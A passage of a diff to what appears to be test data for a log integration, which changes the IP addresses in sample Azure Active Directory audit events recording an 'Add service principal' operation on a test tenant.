"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17974,9 +17974,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { @@ -18216,7 +18216,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -18246,9 +18246,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:31", "ExtendedProperties": [ { @@ -18488,7 +18488,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUp